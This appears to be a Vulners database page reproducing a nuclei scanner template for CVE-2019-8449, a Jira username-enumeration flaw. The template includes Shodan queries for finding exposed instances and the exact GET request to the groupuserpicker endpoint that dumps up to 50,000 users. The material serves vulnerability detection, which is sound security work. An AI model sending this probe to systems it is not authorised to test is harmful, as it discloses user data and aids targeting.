Lucene search
K

Jira <8.4.0 - Information Disclosure

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 72 Views

Jira <8.4.0 - Information Disclosure. /rest/api/latest/groupuserpicker resource allows attacker to enumerate usernames, potentially accessing sensitive information

Related
Refs
Code
id: CVE-2019-8449

info:
  name: Jira <8.4.0 - Information Disclosure
  author: harshbothra_
  severity: medium
  description: Jira before 8.4.0 is susceptible to information disclosure. The /rest/api/latest/groupuserpicker resource can allow an attacker to enumerate usernames, and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information.
  remediation: |
    Upgrade Jira to version 8.4.0 or later to fix the information disclosure vulnerability.
  reference:
    - https://www.doyler.net/security-not-included/more-jira-enumeration
    - https://jira.atlassian.com/browse/JRASERVER-69796
    - http://packetstormsecurity.com/files/156172/Jira-8.3.4-Information-Disclosure.html
    - https://github.com/SexyBeast233/SecBooks
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-8449
    cwe-id: CWE-306
    epss-score: 0.84771
    epss-percentile: 0.99677
    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
      - http.component:"atlassian confluence"
      - cpe:"cpe:2.3:a:atlassian:jira"
  tags: cve,cve2019,atlassian,jira,disclosure,packetstorm,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"users":{"users":'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a41e08514830dea85424cc7ece3afd2da1f1773f249a494c4d6cbd63bb8e02d602203cf74d82328457751112a775ea38b18be63e19590896d249febdf3ac05235ed4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 25
CVSS 3.15.3
EPSS0.84771
72